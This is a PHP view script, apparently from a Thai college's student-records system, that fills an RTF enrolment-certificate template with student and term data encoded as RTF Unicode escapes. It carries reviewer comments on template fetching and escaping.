<?php
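/**
 * Encode a TIS-620 (Thai) byte string as an RTF Unicode group.
 *
 * Every byte becomes an RTF "\uN'" control word holding the decimal code
 * point, and the whole run is wrapped in "{...}". Bytes below 0x80 map to
 * themselves; bytes in the TIS-620 Thai ranges 0xA1-0xDA and 0xDF-0xFB map
 * to U+0E01-U+0E3A / U+0E3F-U+0E5B (code point = 0x0E00 + byte - 0xA0).
 * Any other byte (0x80-0xA0, 0xDB-0xDE, 0xFC-0xFF) is silently dropped, so
 * the output never contains raw high bytes or RTF control characters.
 *
 * NOTE(review): the RTF \uN control word is normally followed by a fallback
 * character for readers without Unicode support; here a literal "'" is
 * emitted in that slot — confirm the consuming reader renders it as intended.
 *
 * @param string $string  TIS-620 bytes. Callers in this file also pass ints
 *                        (intval($dd1), $yy + 543) and iconv() results, which
 *                        may be false; the value is coerced to string.
 * @return string  RTF group, "{}" for empty or fully-dropped input.
 */
function encodeutf($string) {
    // Coerce up front so ints and a false iconv() result behave as strings
    // and strlen()/ord() never see a non-string (deprecated in PHP 8.1+).
    $string = (string) $string;
    $len = strlen($string);
    $parts = array();
    for ($i = 0; $i < $len; $i++) {
        $val = ord($string[$i]);
        if ($val < 0x80) {
            // ASCII: code point equals the byte value.
            $parts[] = '\u'.$val."'";
        } elseif (($val >= 0xA1 && $val <= 0xDA) || ($val >= 0xDF && $val <= 0xFB)) {
            // TIS-620 Thai block: shift into the U+0E00 Unicode block.
            $parts[] = '\u'.(0x0E00 + $val - 0xA0)."'";
        }
        // Any other byte has no mapping here and is dropped.
    }
    return '{'.implode('', $parts).'}';
}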

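/**
 * Fill an RTF template by replacing %%KEY%% placeholders.
 *
 * Reads the template from $doc_file with file_get_contents(), then replaces
 * each "%%".strtoupper($key)."%%" (placeholders are matched in upper case
 * only, case-sensitively) with the corresponding value. Substitution is a
 * single strtr() pass, so a value that itself contains "%%OTHER%%" is never
 * expanded again — with sequential str_replace() a value could inject a
 * later placeholder.
 *
 * No RTF escaping is applied here: "\", "{" and "}" inside a value are
 * emitted verbatim and become RTF control syntax. Callers must pre-escape
 * values (this file does so with encodeutf(), which turns every byte into a
 * \uN' control word); do not pass raw user input through this function.
 *
 * SECURITY NOTE(review): $doc_file goes straight to file_get_contents(), so
 * an http(s):// value (as the caller in this file builds from base_url())
 * is fetched over the network via the URL stream wrapper and depends on
 * allow_url_fopen; a local filesystem path is the safer choice.
 *
 * @param array  $vars      placeholder name => replacement value
 * @param string $doc_file  template path or URL readable by file_get_contents()
 * @return string|false  filled template, or false when the file cannot be read
 */
function populate_RTF($vars, $doc_file) {
    $document = file_get_contents($doc_file);
    if ($document === false) {
        return false;
    }
    if (!is_array($vars)) {
        // Tolerate an unset/non-array $vars (e.g. no data row was found)
        // by returning the template unchanged instead of a foreach warning.
        return $document;
    }

    $map = array();
    foreach ($vars as $key => $value) {
        $map['%%'.strtoupper($key).'%%'] = (string) $value;
    }
    return $map ? strtr($document, $map) : $document;
}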

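// Template variables are built only when a student row exists. Start from an
// empty set so populate_RTF() never receives an undefined $vars (that would
// raise a warning while the headers below are still sent).
$vars = array();

if ($qu_std->num_rows()) {
    // $qu_cfg, $qu_std, $qu_tmc, $qu_prs, $qu_ac, $tmc, $showStPic and $bNo
    // are expected to come from the controller (CodeIgniter view scope).
    $row_cfg = isset($qu_cfg) ? $qu_cfg->row() : NULL;
    $row_std = isset($qu_std) ? $qu_std->row() : NULL;

    $stName = getval('prefixName', $row_std).getval('stdName', $row_std).' '.getval('stdSurname', $row_std);

    if ($qu_tmc->num_rows()) {
        $row_tmc = $qu_tmc->row();
        $tmId = $row_tmc->tmcTmId;
    } else {
        $tmId = '';
    }
    // "[/|-]" uses [ ] as the PCRE delimiters, so the pattern is "/|-":
    // split on either "/" or "-". Fewer than three parts leaves $dd1 unset.
    list($yy1, $mm1, $dd1) = preg_split("[/|-]", getval('stdAdmitDate', $row_std));

    // NOTE(review): $con_tcf is built but not passed to qryTmc() below —
    // confirm whether the model reads it another way or this is dead code.
    $con_tcf = array('tmcAcY' => getval('stdAdY', $row_std) + getval('curNumStudyY', $row_std) - 1,
        'tmcTmId' => getval('curNumTmPerY', $row_std)
    );
    $qu_tmc = $tmc->qryTmc();
    $row_tmc = $qu_tmc->row();
    list($yy2, $mm2, $dd2) = preg_split("[/|-]", $row_tmc->tmcToDate);

    // Default the signing officer so a missing person row does not leave
    // $ofName / $row_prs undefined further down.
    $ofName = '';
    $row_prs = NULL;
    if ($qu_prs->num_rows()) {
        $row_prs = $qu_prs->row();
        $ofName = $row_prs->name;
    }
    $row_ac = $qu_ac->row();

    // Title: director when the signer is the record's director id, otherwise
    // acting director. Loose == kept because the ids may differ in type.
    $isDirector = ($row_prs !== NULL && $row_ac !== NULL
        && $row_prs->prsId == $row_ac->acPrsIdDirector);
    $pos = $isDirector ? 'ผู้อำนวยการ' : 'รักษาการในตำแหน่งผู้อำนวยการ';

    // Student signature lines are only printed when the picture flag is set.
    $stSignature1 = ($showStPic) ? '..................................................................ลายมือชื่อนักศึกษา' : '';
    $stSignature2 = ($showStPic) ? '(ชื่อ - สกุลตัวบรรจง)' : '';

    // Every value is converted UTF-8 -> TIS-620 and then to RTF \uN' escapes
    // by encodeutf(); that is the only RTF escaping applied, so no raw string
    // may be added here. Years are shifted +543 to the Thai Buddhist Era.
    $vars = array('BNO' => encodeutf(iconv('UTF-8', 'TIS-620', $bNo)),
        'COLLEGENAME' => encodeutf(iconv('UTF-8', 'TIS-620', getval('cfgClgName', $row_cfg))),
        'COLLEGEADDRESS' => encodeutf(iconv('UTF-8', 'TIS-620', getval('cfgClgAddr', $row_cfg))),
        'STNAME' => encodeutf(iconv('UTF-8', 'TIS-620', $stName)),
        'PROGRAMNAME' => encodeutf(iconv('UTF-8', 'TIS-620', getval('curName', $row_std))),
        'GENNO' => encodeutf(getval('genNo', $row_std)),
        'STUDYYEAR' => encodeutf(getval('curNumStudyY', $row_std)),
        'DD1' => encodeutf(intval($dd1)),
        'MM1' => encodeutf(iconv('UTF-8', 'TIS-620', getMonthTh($mm1))),
        'YY1' => encodeutf($yy1 + 543),
        'STUDENTYEAR' => encodeutf(getval('stdSyId', $row_std)),
        'TMID' => encodeutf($tmId),
        'DD2' => encodeutf(intval($dd2)),
        'MM2' => encodeutf(iconv('UTF-8', 'TIS-620', getMonthTh($mm2))),
        'YY2' => encodeutf($yy2 + 543),
        'DD3' => encodeutf(intval(date('d'))),
        'MM3' => encodeutf(iconv('UTF-8', 'TIS-620', getMonthTh(date('m')))),
        'YY3' => encodeutf(date('Y') + 543),
        'OFNAME' => encodeutf(iconv('UTF-8', 'TIS-620', $ofName)),
        'POS' => encodeutf(iconv('UTF-8', 'TIS-620', $pos)),
        'STSIGNATURE1' => encodeutf(iconv('UTF-8', 'TIS-620', $stSignature1)),
        'STSIGNATURE2' => encodeutf(iconv('UTF-8', 'TIS-620', $stSignature2))
    );
}

// SECURITY NOTE(review): the template location is a URL (base_url() plus the
// 'rg_docRif' config item), so file_get_contents() fetches it over HTTP
// through the URL wrapper. That requires allow_url_fopen and, if base_url()
// is derived from the request Host header, lets the request influence where
// the template is fetched from — confirm the config; a filesystem path
// (e.g. under FCPATH) avoids both concerns.
$new_rtf = populate_RTF($vars, base_url().$this->config->item('rg_docRif'));

// NOTE(review): populate_RTF() returns false when the template cannot be
// read; that currently serves an empty document with Content-length 0.
header("Content-type: application/msword");
header("Content-disposition: inline; filename=ris120.rtf");
header("Content-length: ".strlen($new_rtf));

echo $new_rtf;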
?>
